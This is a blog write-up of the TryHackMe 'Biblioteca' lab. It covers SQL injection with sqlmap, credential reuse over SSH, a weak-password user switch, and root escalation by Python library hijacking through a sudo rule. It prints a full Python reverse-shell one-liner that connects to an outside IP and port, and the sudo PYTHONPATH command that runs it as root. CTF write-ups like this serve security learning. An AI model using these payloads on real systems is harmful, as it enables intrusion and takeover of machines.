Skip to main content
Hashnodeb1d0ws

Command Palette

Search for a command to run...

Biblioteca - TryHackMe

Updated
3 min read
Biblioteca - TryHackMe
B
b1d0ws
Part of seriesWrite-Ups

User Flag

First, we start by enumerating the ports and services.

In the print below I have already set the ports to 22 and 8000 because I found out that they were open in a regular scan without any nmap flags.

I access the website and see that there is a login page. I try to create a user in the Sign-Up link to see what it looks like in there, but there is nothing interesting there.

Since the first page is a login page, I quickly try some SQL Injection with sqlmap, first by intercepting the POST request and then using it with the sqlmap command.

We can observe that the parameter username is vulnerable so I start to retrieve information from the database. You can see in the image above that the Database is called website.

As this is a TryHackMe host probably the database is small, so to gain some time I use the flag –dump-all to dump everything from the website database.

Here I got a username and password and immediately try these credentials in SSH.

Trying to find the flag, we see that it is in the hazel home and we don’t have permissions to read it. So, we need to find some way to login as hazel.

In this part I got stuck for a few minutes and I need to look at the hint. The hint was “Weak password”, so I just tried a simple password combination and “hazel”, same as the username, worked it.

Now logged as hazel, we just need to cat the user.txt and get the first flag.

Root Flag

The first thing I do when I need to privilege escalation is to check the permissions with sudo and if there is something interesting in this user.

We see that hazel can use the command python3 with root permissions in the file hasher.py.

Taking a look at this file, we see that there is a library being used: hashlib.

Here we can do something that is called Python Library Hijacking. Basically, we just need to modify the library file and insert some malicious payload to get this payload executed by root.

This article explains this exploration in a very clear way.

Since we don’t have permission to edit the current library file, we copied it to the /tmp directory.

Now we can edit it and insert a python reverse shell payload with our tun0 address.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.117.185",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

We need to execute the python file with the PYTHONPATH argument, to tell where python will search for the libraries included in the hasher.py. When we execute the hasher.py, it will call the library hashlib and since there is this playload in the library file, the reverse shell will be popped in our listener.

Remember to set your listener before executing the command.

sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/hazel/hasher.py

Finally we obtain our reverse shell and just cat root.txt for the second flag.

See ya =)

#ctf#write-up#pentest

Comments

Join the discussion

No comments yet. Be the first to comment.

Write-Ups

Part 5 of 7
Up next

Anthem - TryHackMe

Website Analysis First of all, we run nmap and check which ports are open. As you can see, I ran a version scan with default scripts on the ports I found which were 80 (HTTP) and 3389 (RDP) to see if I could find anything interesting, but nothing tur...

More from this blog

b1d0ws

24 posts